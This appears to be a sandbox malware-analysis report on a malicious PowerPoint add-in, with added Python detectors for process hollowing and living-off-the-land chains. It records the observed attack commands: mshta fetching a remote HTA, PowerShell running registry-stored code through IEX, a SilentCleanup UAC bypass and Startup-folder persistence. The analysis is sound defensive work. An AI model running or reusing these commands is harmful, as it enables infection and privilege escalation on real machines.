Command Line taskeng.exe {4AF814F3-B5F2-456B-9FF3-B4FF2E8485C0} S-1-5-21-4219442223-4223814209-3835049652-1000:Q9IATRKPRH\kEecfMwgj:Interactive:LUA[1]
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 178825, Reason: Child Process
Unmonitor End Time End Time: 279253, Reason: Terminated by Timeout
Monitor duration 100.43s
Return Code Unknown
PID 2808
Parent PID 816
Bitness 64 Bit
Process #13: mshta.exe
ID 13
File Name c:\windows\system32\mshta.exe
Command Line C:\Windows\system32\MsHtA.EXE http://1230948%[email protected]/p/9.html
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 181216, Reason: Child Process
Unmonitor End Time End Time: 279253, Reason: Terminated by Timeout
Monitor duration 98.04s
Return Code Unknown
PID 3232
Parent PID 2808
Bitness 64 Bit

Dropped Files (7)
File Name | File Size | SHA256 (the YARA Match column is empty for every entry; "-" as file name means the content was only downloaded to memory)
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MM5O9XQS\cookienotice[1].js | 6.36 KB | 068ffe90977f2b5b2dc2ef18572166e85281bd0ecb31c4902464b23db54d2568
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMMR5K9K\3822632116-css_bundle_v2[1].css | 36.12 KB | 224d95cce08108610c46ef4134793dbdd619e43e90e9d9cf42716a08f45222f9
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MM5O9XQS\authorization[1].css | 1 bytes | 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
- | 95 bytes | 0fdcb4746995f0d5240e5ec11370cb950722a894f3cff4118aa68ccc92010edd
- | 403 bytes | ecb30886406e3f776ff7bc3834de849944471e626ff148bed2fa389d02866044
- | 86.98 KB | 329199d138adcc51a8bd2e72401c2e64be9a1e8f3009dc2dc3774ac9deb5f1b7
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MM5O9XQS\warning[1] | 1.04 KB | 5f95eff2bcaaea82d0ae34a007de3595c0d830ac4810ea4854e6526e261108e9

Host Behavior (Type: Count)
System 101, Module 116, File 47, Environment 5, Registry 169, (unnamed) 5, Keyboard 2, Mutex 1, Window 15, COM 40, (unnamed) 3, Process 16

Network Behavior (Type: Count)
HTTP 2, HTTPS 2, TCP 3
Process #14: aspnet_compiler.exe
ID 14
File Name c:\windows\microsoft.net\framework\v4.0.30319\aspnet_compiler.exe
Command Line #cmd
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 186965, Reason: Child Process
Unmonitor End Time End Time: 272842, Reason: Terminated
Monitor duration 85.88s
Return Code 1073807364
PID 3584
Parent PID 3828
Bitness 32 Bit
Injection Information (6)
Injection Type | Source Process | Source / Target TID | Address / Name | Size | Success Count
Modify Memory | #6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe | 0xd08 | 0x400000 (4194304) | 0x200 | 1
Modify Memory | #6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe | 0xd08 | 0x402000 (4202496) | 0x35600 | 1
Modify Memory | #6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe | 0xd08 | 0x438000 (4423680) | 0x400 | 1
Modify Memory | #6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe | 0xd08 | 0x43a000 (4431872) | 0x200 | 1
Modify Memory | #6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe | 0xd08 | 0x7efde008 (2130567176) | 0x4 | 1
Modify Control Flow | #6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe | 0xd08 / 0xba0 | - | - | 1
Host Behavior
Type | Count
Registry | 60
Process | 2
File | 21
Module | 70
Window | 3
System | 9
User | 2
- | 32
COM | 33
Environment | 5
Network Behavior
Type | Count
HTTP | 1
TCP | 1
Process #15: aspnet_compiler.exe
ID 15
File Name c:\windows\microsoft.net\framework\v4.0.30319\aspnet_compiler.exe
Command Line #Powershell
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 191130, Reason: Child Process
Unmonitor End Time End Time: 192683, Reason: Terminated
Monitor duration 1.55s
Return Code 4294967295
PID 2180
Parent PID 3828
Bitness 32 Bit
Process #16: aspnet_compiler.exe
ID 16
File Name c:\windows\microsoft.net\framework\v4.0.30319\aspnet_compiler.exe
Command Line #Powershell
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 191942, Reason: Child Process
Unmonitor End Time End Time: 199485, Reason: Terminated
Monitor duration 7.54s
Return Code 4294967295
PID 2188
Parent PID 3828
Bitness 32 Bit
Injection Information (6)
Injection Type | Source Process | Source / Target TID | Address / Name | Size | Success Count
Modify Memory | #6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe | 0xd08 | 0x400000 (4194304) | 0x200 | 1
Modify Memory | #6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe | 0xd08 | 0x402000 (4202496) | 0x35600 | 1
Modify Memory | #6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe | 0xd08 | 0x438000 (4423680) | 0x400 | 1
Modify Memory | #6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe | 0xd08 | 0x43a000 (4431872) | 0x200 | 1
Modify Memory | #6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe | 0xd08 | 0x7efde008 (2130567176) | 0x4 | 1
Modify Control Flow | #6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe | 0xd08 / 0x890 | - | - | 1
Host Behavior
Type | Count
Registry | 4
File | 19
Module | 4
Window | 3
System | 2
User | 1
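The injection tables for process #14 and process #16 record the same sequence from the PowerShell source (process #6): a 0x200-byte write at 0x400000, a 0x35600-byte write at 0x402000 and two small writes at 0x438000 and 0x43a000 (a PE header followed by its sections at the default 32-bit image base), a 4-byte write at 0x7efde008, and one Modify Control Flow entry. Taken together that is the write pattern of process hollowing: the legitimate aspnet_compiler.exe image is replaced in place and the main thread is redirected into the new image. The Python below is an added example, not part of the VMRay report: it parses the records exactly as printed above and applies that heuristic. Reading the 4-byte write as PEB.ImageBaseAddress (offset 8 in the 32-bit PEB) and capping the image span at 16 MiB are assumptions of this example, not statements made by the report.

```python
"""Recognise the process-hollowing write pattern in a VMRay 'Injection Information' table.

Added example, not VMRay code. Parses the three-line records printed for processes
#14 and #16 and applies a heuristic: a small write at a page-aligned address (PE
headers), further writes above it (sections), a pointer-sized write at offset 8 of
some other page (assumed PEB.ImageBaseAddress) and a 'Modify Control Flow' entry.
"""
import re
from dataclasses import dataclass, field

# Records quoted from the Process #14 table (source: process #6 powershell.exe).
PROCESS_14_RECORDS = r"""
Modify Memory
#6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
0xd08 0x400000(4194304) 0x200 1
Modify Memory
#6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
0xd08 0x402000(4202496) 0x35600 1
Modify Memory
#6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
0xd08 0x438000(4423680) 0x400 1
Modify Memory
#6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
0xd08 0x43a000(4431872) 0x200 1
Modify Memory
#6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
0xd08 0x7efde008(2130567176) 0x4 1
Modify Control Flow
#6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
0xd08 / 0xba0 - 1
"""

MEM_ROW = re.compile(r"^0x([0-9a-f]+)\s+0x([0-9a-f]+)\(\d+\)\s+0x([0-9a-f]+)\s+\d+$", re.I)
CF_ROW = re.compile(r"^0x([0-9a-f]+)\s*/\s*0x([0-9a-f]+)\s+-\s+\d+$", re.I)

PAGE = 0x1000
MAX_IMAGE = 0x1000000        # 16 MiB: writes farther than this above the base are not the image (assumption)
PEB_IMAGE_BASE_OFFSET = 0x8  # PEB.ImageBaseAddress is at +0x8 in the 32-bit PEB (assumed meaning of the 4-byte write)


@dataclass
class MemWrite:
    source_tid: int
    address: int
    size: int


@dataclass
class InjectionTable:
    writes: list = field(default_factory=list)
    hijacked_tids: list = field(default_factory=list)  # target TIDs of 'Modify Control Flow' rows


def parse_injection_table(text: str) -> InjectionTable:
    """Turn the report's 3-line records (type / source process / values) into rows."""
    table, kind = InjectionTable(), None
    for line in (l.strip() for l in text.splitlines()):
        if line in ("Modify Memory", "Modify Control Flow"):
            kind = line
        elif not line or line.startswith("#"):
            continue  # blank, or the source-process line: not needed here
        elif kind == "Modify Memory" and (m := MEM_ROW.match(line)):
            table.writes.append(MemWrite(int(m[1], 16), int(m[2], 16), int(m[3], 16)))
        elif kind == "Modify Control Flow" and (m := CF_ROW.match(line)):
            table.hijacked_tids.append(int(m[2], 16))
    return table


def classify_hollowing(table: InjectionTable) -> dict:
    """Score the write set against the hollowing pattern and return the evidence."""
    writes = sorted(table.writes, key=lambda w: w.address)
    verdict = {"image_base": None, "image_end": None, "image_bytes": 0,
               "peb_image_base_patch": None,
               "thread_context_set": bool(table.hijacked_tids),
               "process_hollowing": False}
    # PE headers: the first write of at most one page at a page-aligned address.
    header = next((w for w in writes if w.address % PAGE == 0 and w.size <= PAGE), None)
    if header is None:
        return verdict
    base = header.address
    in_image = [w for w in writes if base <= w.address < base + MAX_IMAGE]
    verdict["image_base"] = base
    verdict["image_end"] = max(w.address + w.size for w in in_image)
    verdict["image_bytes"] = sum(w.size for w in in_image)
    # Pointer-sized write at +8 of a page outside the image: the PEB ImageBaseAddress fix-up.
    for w in writes:
        if w not in in_image and w.size in (4, 8) and w.address % PAGE == PEB_IMAGE_BASE_OFFSET:
            verdict["peb_image_base_patch"] = w.address
    verdict["process_hollowing"] = (len(in_image) > 1  # headers plus at least one section
                                    and verdict["peb_image_base_patch"] is not None
                                    and verdict["thread_context_set"])
    return verdict


if __name__ == "__main__":
    for key, value in classify_hollowing(parse_injection_table(PROCESS_14_RECORDS)).items():
        shown = hex(value) if isinstance(value, int) and not isinstance(value, bool) else value
        print(f"{key:>22}: {shown}")
```

Run stand-alone it prints the evidence for process #14 (image base 0x400000, image end 0x43a200, PEB patch at 0x7efde008, thread context set); the process #16 rows give the same result with target TID 0x890. The heuristic requires all three signals, so a lone header write, or section writes without a thread-context change, is not reported as hollowing.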
Process #18: wscript.exe
ID 18
File Name c:\windows\syswow64\wscript.exe
Command Line "C:\Windows\System32\WScript.exe" "C:\Users\Public\Chrome.vbs"
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 208963, Reason: Child Process
Unmonitor End Time End Time: 211248, Reason: Terminated
Monitor duration 2.29s
Return Code 0
PID 2548
Parent PID 3928
Bitness 32 Bit
Host Behavior
Type | Count
System | 15
Module | 22
Registry | 27
- | 1
Window | 2
COM | 5
File | 4
Process | 1
Process #19: powershell.exe
ID 19
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -ExecutionPolicy Unrestricted -File C:\Users\Public\run.ps1
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 210020, Reason: Child Process
Unmonitor End Time End Time: 229936, Reason: Terminated
Monitor duration 19.92s
Return Code 0
PID 2660
Parent PID 2548
Bitness 32 Bit
Host Behavior
Type | Count
Environment | 27
File | 160
System | 15
Registry | 82
Process | 1
Module | 5
- | 22
- | 1
Process #20: schtasks.exe
ID 20
File Name c:\windows\syswow64\schtasks.exe
Command Line "C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 226918, Reason: Child Process
Unmonitor End Time End Time: 229032, Reason: Terminated
Monitor duration 2.11s
Return Code 1
PID 3700
Parent PID 2660
Bitness 32 Bit
Host Behavior
Type | Count
System | 2
Module | 7
COM | 1
File | 10
Process #21: powershell.exe
ID 21
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line powershell.exe ((gp HKCU:\Software).cookerr)|IEX
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 240103, Reason: Child Process
Unmonitor End Time End Time: 266115, Reason: Terminated
Monitor duration 26.01s
Return Code 1073807364
PID 3680
Parent PID 2812
Bitness 64 Bit
Host Behavior
Type | Count
System | 2
Module | 1
File | 1
Environment | 4
Process #22: wscript.exe
ID 22
File Name c:\windows\syswow64\wscript.exe
Command Line "C:\Windows\System32\WScript.exe" "C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.vbs"
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 243679, Reason: Child Process
Unmonitor End Time End Time: 245911, Reason: Terminated
Monitor duration 2.23s
Return Code 0
PID 3404
Parent PID 3928
Bitness 32 Bit
Host Behavior
Type | Count
System | 15
Module | 22
Registry | 27
- | 1
Window | 2
COM | 5
File | 4
Process | 1
Process #23: powershell.exe
ID 23
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -ExecutionPolicy Unrestricted -File C:\Users\Public\msi.ps1
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 244805, Reason: Child Process
Unmonitor End Time End Time: 250684, Reason: Terminated
Monitor duration 5.88s
Return Code 4294770688
PID 292
Parent PID 3404
Bitness 32 Bit
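The process records above give a PID, a parent PID and a command line for every monitored process, which is enough to rebuild the execution chain and to score each command line against the living-off-the-land patterns visible in it: mshta.exe handed a URL, script hosts running .vbs files from C:\Users\Public or the Startup folder, PowerShell with the execution policy overridden or with its script body pulled from HKCU and passed to IEX, schtasks.exe starting the auto-elevating SilentCleanup task on demand, and aspnet_compiler.exe with a command line that does not even name the binary. The Python below is an added example, not part of the VMRay report; the rules and the ATT&CK technique IDs are this example's own mapping, and parent PIDs that have no record in this section (816, 2812, 3828, 3928) simply end a chain.

```python
"""Rebuild the process tree from this report's per-process records and flag the LOLBin chain.

Added example, not a VMRay feature; the rules are one analyst's reading of the
command lines quoted above and the ATT&CK IDs are this example's own mapping.
"""
import re

# Fields quoted from the Process #12 - #22 records above (only the fields the rules need).
REPORT_PROCESSES = r"""
Process #12: taskeng.exe
Command Line taskeng.exe {4AF814F3-B5F2-456B-9FF3-B4FF2E8485C0} S-1-5-21-4219442223-4223814209-3835049652-1000:Q9IATRKPRH\kEecfMwgj:Interactive:LUA[1]
PID 2808
Parent PID 816
Process #13: mshta.exe
Command Line C:\Windows\system32\MsHtA.EXE http://1230948%[email protected]/p/9.html
PID 3232
Parent PID 2808
Process #14: aspnet_compiler.exe
Command Line #cmd
PID 3584
Parent PID 3828
Process #18: wscript.exe
Command Line "C:\Windows\System32\WScript.exe" "C:\Users\Public\Chrome.vbs"
PID 2548
Parent PID 3928
Process #19: powershell.exe
Command Line "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -ExecutionPolicy Unrestricted -File C:\Users\Public\run.ps1
PID 2660
Parent PID 2548
Process #20: schtasks.exe
Command Line "C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
PID 3700
Parent PID 2660
Process #21: powershell.exe
Command Line powershell.exe ((gp HKCU:\Software).cookerr)|IEX
PID 3680
Parent PID 2812
Process #22: wscript.exe
Command Line "C:\Windows\System32\WScript.exe" "C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.vbs"
PID 3404
Parent PID 3928
"""


def parse_processes(text: str) -> dict:
    """Return {pid: record} from the report's 'Process #N: name' blocks."""
    records, cur = [], None
    for line in (l.strip() for l in text.splitlines()):
        if m := re.match(r"Process #(\d+): (.+)", line):
            cur = {"id": int(m[1]), "name": m[2].lower(), "cmd": "", "pid": None, "ppid": None}
            records.append(cur)
        elif cur is None or not line:
            continue
        elif line.startswith("Parent PID "):   # test before the shorter 'PID ' prefix
            cur["ppid"] = int(line.split()[-1])
        elif line.startswith("PID "):
            cur["pid"] = int(line.split()[-1])
        elif line.startswith("Command Line "):
            cur["cmd"] = line[len("Command Line "):]
    return {r["pid"]: r for r in records if r["pid"] is not None}


def ancestry(procs: dict, pid: int) -> list:
    """Image names from the oldest recorded ancestor down to pid; a PID with no record ends the chain."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid]["name"])
        pid = procs[pid]["ppid"]
    return chain[::-1]


def findings_for(p: dict) -> list:
    """Rules over one record's image name and command line (case-insensitive)."""
    name, lc, out = p["name"], p["cmd"].lower(), []
    if name == "mshta.exe" and re.search(r"https?://", lc):
        out.append("mshta.exe fetching a remote HTA (T1218.005)")
    if name in ("wscript.exe", "cscript.exe") and ("\\users\\public\\" in lc or "\\startup\\" in lc):
        out.append("script host running a .vbs from C:\\Users\\Public or a Startup folder (T1547.001 when in Startup)")
    if name == "powershell.exe":
        if "-executionpolicy" in lc and ("unrestricted" in lc or "bypass" in lc):
            out.append("execution policy overridden on the command line")
        if "-file" in lc and "\\users\\public\\" in lc:
            out.append("script file staged in C:\\Users\\Public")
        if "hkcu:" in lc and re.search(r"\biex\b|invoke-expression", lc):
            out.append("script body read from an HKCU registry value and passed to IEX")
    if name == "schtasks.exe" and "/run" in lc and "silentcleanup" in lc:
        out.append("SilentCleanup task started on demand: it auto-elevates, a known UAC-bypass pattern (T1548.002)")
    if name == "aspnet_compiler.exe" and "aspnet_compiler" not in lc:
        out.append("command line does not name the image: consistent with a hollowed host process (T1055.012)")
    return out


def analyze(procs: dict) -> dict:
    """{pid: findings} for every recorded process that trips at least one rule."""
    return {pid: f for pid, p in procs.items() if (f := findings_for(p))}


if __name__ == "__main__":
    procs = parse_processes(REPORT_PROCESSES)
    for pid, flags in sorted(analyze(procs).items()):
        print(f"PID {pid}: {' -> '.join(ancestry(procs, pid))}")
        for flag in flags:
            print(f"    {flag}")
```

Run as-is it prints one chain per flagged process, for example wscript.exe -> powershell.exe -> schtasks.exe for PID 3700 and taskeng.exe -> mshta.exe for PID 3232; taskeng.exe itself trips no rule and so does not appear. The same parser accepts the full record text of this section, since it ignores every field it does not use.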
ARTIFACTS
File
SHA256 | File Names | Category | File Size | MIME Type | Operations | Verdict
dc82cadcaad72e4f7aa996a149126ecb15e652606e55a12efcb994a16f5159a9 | c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\9_17[1].html | Downloaded File | 32.91 KB | text/html | - | MALICIOUS
329199d138adcc51a8bd2e72401c2e64be9a1e8f3009dc2dc3774ac9deb5f1b7 | c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internet files\content.ie5\x9ohk109\9[1].html | Downloaded File | 86.98 KB | text/html | - | MALICIOUS
8e59758c7dba0ca744790644a23fa08c1e416e8f38ee221868b6560a2c915b51 | C:\Users\kEecfMwgj\Desktop\9_pdf.ppam | Sample File | 8.80 KB | application/vnd.openxmlformats-officedocument.presentationml.presentation | - | MALICIOUS
6cc209598f4fa921559ad80d0d75cd214f4d021d39884b59811d69ac98125b2c | c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat | Modified File | 48.00 KB | application/octet-stream | - | CLEAN
224d95cce08108610c46ef4134793dbdd619e43e90e9d9cf42716a08f45222f9 | C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMMR5K9K\3822632116-css_bundle_v2[1].css, C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MM5O9XQS\3822632116-css_bundle_v2[1].css | Downloaded File | 36.12 KB | text/plain | Access, Read | CLEAN
5993c37fe8dfca6e242e6e5b7c48ae99c9d41a8fe3d209dd38a0d161516b519a | C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMMR5K9K\3046902713-ieretrofit[1].js | Downloaded File | 26.01 KB | text/plain | Access, Read | CLEAN
01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b | C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X9OHK109\authorization[1].css, C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MM5O9XQS\authorization[1].css | Downloaded File | 1 bytes | application/octet-stream | Access, Read | CLEAN
9d358297f944faf6cfd24e3069ef42fa2aaef6fe243b61389a9a02c8d6de9a50 | C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X9OHK109\2583860411-widgets[1].js | Downloaded File | 147.02 KB | text/plain | Access, Read | CLEAN
068ffe90977f2b5b2dc2ef18572166e85281bd0ecb31c4902464b23db54d2568 | C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MM5O9XQS\cookienotice[1].js, C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X9OHK109\cookienotice[1].js | Downloaded File | 6.36 KB | text/plain | Access, Read | CLEAN
0fc52ef116f03fd95f9857856f1e2cbdfa2cacc398e066db0d8d5481739bc2d7 | C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RIJUQL1C\281434096-static_pages[1].css | Downloaded File | 3.72 KB | text/plain | Access, Read | CLEAN
21cc4dc6c3c01b84c808004173f42e3ed1b4f09551a10d69b4cec7394a1590e6 | C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MM5O9XQS\3101730221-analytics_autotrack[1].js | Downloaded File | 24.70 KB | text/plain | Access, Read | CLEAN
3e6e1c58507746b01dd0f74cd9d40c885ffaea0cc025eb4f27c4c947916f2068 | C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMMR5K9K\css[1].txt | Downloaded File | 172 bytes | text/plain | Access, Read | CLEAN
e61660c659c426e45bce2937dddb01af6b550502a2904546575c1ec2ba1121dd | C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RIJUQL1C\analytics[1].js | Downloaded File | 48.23 KB | text/plain | Access, Read | CLEAN
8684a32d1a10d050a26fc33192edf427a5f0c6874c590a68d77ae6e0d186bd8a | C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MM5O9XQS\maia[1].css | Downloaded File | 42.48 KB | text/plain | Access, Read | CLEAN
01e698231e9d93dceaa9a97f4e5cdbdbceefbea67d4e39acd0391e1cae00889b | C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X9OHK109\mem5YaGs126MiZpBA-UN_r8OUuht[1].eot | Downloaded File | 15.60 KB | application/vnd.ms-fontobject | Access, Read | CLEAN
22f8356c61b22b8a6506465087d48d831303e10c66bd3ced965f6a32a7302dde | C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MM5O9XQS\kJEjBvgX7BgnkSrUwT8UnLVc38YydejYY-oE_LvN[1].eot | Downloaded File | 152.93 KB | application/vnd.ms-fontobject | Access, Read | CLEAN
49d0d1473181447caad524188bfcb1344b20a4ffa42bb0b5ff7695e379ae3b79 | C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RIJUQL1C\css[1].txt | Downloaded File | 402 bytes | text/plain | Access, Read | CLEAN
f0da44c78fae13b0c7078626f17f4b5b60ef9e396d6cfc5cec5304d17c358d1a | C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMMR5K9K\pxiDypQkot1TnFhsFMOfGShVF9eK[1].eot | Downloaded File | 27.95 KB | application/vnd.ms-fontobject | Access, Read | CLEAN
be869a73a160440e8bfc5c7d84a907febd61075d920d51c7d0097d7295c865cd | C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RIJUQL1C\KFOmCnqEu92Fr1Mu4mxO[1].eot | Downloaded File | 17.40 KB | application/vnd.ms-fontobject | Access, Read | CLEAN
1adc32fffc15aee5a186eb7a6fd12a09c377c83665289589c94058df73a9de19 | C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | Dropped File | 8.99 KB | application/octet-stream | Access, Create, Write, Read | CLEAN
61e40c1da7fd6964108819d35ac2641ec11f80d18f81b3fdc361612e6060bf8c | C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.vbs, C:\Users\Public\OneDrive.vbs | Dropped File | 398 bytes | text/plain | Delete, Write, Access, Create, Read | CLEAN
7990e703ae060c241eba6257d963af2ecf9c6f3fbdb57264c1d48dda8171e754 | C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MM5O9XQS\error[1], C:\Users\kEecfMwgj\AppD......t.IE5\RIJUQL1C\error[1], C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X9OHK109\error[1] | Dropped File | 3.17 KB | text/html | Access, Create, Write | CLEAN
0b113b5594ea4cfeb6346d6f997c2dd8a1623037a855b9f896093ec1e1426811 | c:\users\keecfmwgj\appdata\roaming\microsoft\windows\cookies\keecfmwgj@blogger[1].txt | Dropped File | 97 bytes | text/plain | - | CLEAN
bf0a747e7005ace88140897c4c166749eaffcd9f96286c431fa3409709a0b344 | c:\users\keecfmwgj\appdata\roaming\microsoft\windows\cookies\keecfmwgj@blogger[2].txt | Dropped File | 195 bytes | text/plain | - | CLEAN
966240c0527b20e8e2553b7e5a68594ae69230aa00186f2c6c2c342405494837 | C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MM5O9XQS\error[1], C:\Users\kEecfMwgj\AppD......t.IE5\RIJUQL1C\error[1], C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X9OHK109\error[1] | Dropped File | 4.12 KB | text/plain | Access, Create, Write | CLEAN
5f95eff2bcaaea82d0ae34a007de3595c0d830ac4810ea4854e6526e261108e9 | C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X9OHK109\warning[2], C:\Users\kEecfMwgj\Ap... ...5\MM5O9XQS\warning[1], C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RIJUQL1C\warning[1] | Dropped File | 1.04 KB | image/gif | Access, Create, Write | CLEAN
049d229c448e844e1e6d7e30478d986f549c05471764db32ee349f494c3e1314 | C:\Users\Public\alosh.ps1 | Dropped File | 12.46 KB | text/plain | Delete, Write, Access, Create, Read | CLEAN
76e20cb044db745f7065bff4d5bb09c16d83ca1d17f615fa2e41e1d68f1cde17 | C:\Users\Public\run.ps1 | Dropped File | 559 bytes | text/plain | Delete, Write, Access, Create, Read | CLEAN
7993a1c616e7d70074f3508ee8fb3d5b709f2a6894cd5a3fceff1630503a6513 | C:\Users\Public\test.ps1 | Dropped File | 374 bytes | text/plain | Delete, Write, Access, Create, Read | CLEAN
03b7e264915f482ca3499e842e8e71a2186c67f067adbd222059302da7b320f7 | C:\Users\Public\vb.vbs | Dropped File | 495 bytes | text/plain | Delete, Write, Access, Create, Read | CLEAN
febb4719018181cf1dc5ed66812439e8c0a8b982a18c2e77354986804b71c1fa | C:\Users\Public\Chrome.vbs | Dropped File | 236 bytes | text/plain | Delete, Write, Access, Create, Read | CLEAN
2dc8d9262332f8848cc09468086d4c38fc1c5b9aac4619a42fc1c5634b979d1f | - | Downloaded File | 152 bytes | text/html | - | CLEAN
ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99 | - | Downloaded File | 889 bytes | application/octet-stream | - | CLEAN
167b9eed2d5009b99c0010be91da509c0cf52e388517053ac48cab5b4ba94a76 | - | Downloaded File | 223 bytes | text/html | - | CLEAN
58d607271f942eac12dcd237fd5333660a39517fab938ee95f0ce9234238360b | - | Downloaded File | 313 bytes | text/html | - | CLEAN
dfe0f74a965b963675ff78e07d226005aa7b5a93d2e6e6df98b45bee442406d1 | - | Downloaded File | 2.70 KB | text/html | - | CLEAN
7474f8408ddf635ab3531f751ecc3f0dc474823d74baac91ee43e63c05ba0979 | - | Downloaded File | 384 bytes | text/plain | - | CLEAN
bd9df047d51943acc4bc6cf55d88edb5b6785a53337ee2a0f74dd521aedde87d | - | Downloaded File | 178 bytes | text/html | - | CLEAN
25a34aed1f1f78b098376e9e7b6785fa7eaf3d9281192ff5e3915e6083ec8450 | c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\blogin[1].g | Downloaded File | 149.99 KB | text/html | - | CLEAN
cbad27c35fbc84e2da4280476adeb197566db2750b8b4a79eb7e872db8d8acb7 | c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internet files\content.ie5\mm5o9xqs\blogger-logotype-color-black-1x[1].png | Downloaded File | 1.13 KB | image/png | - | CLEAN
0fdcb4746995f0d5240e5ec11370cb950722a894f3cff4118aa68ccc92010edd | c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internet files\content.ie5\x9ohk109\body_gradient_tile_light[1].png, c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internet files\content.ie5\pmmr5k9k\body_gradient_tile_light[1].png | Downloaded File | 95 bytes | image/png | - | CLEAN
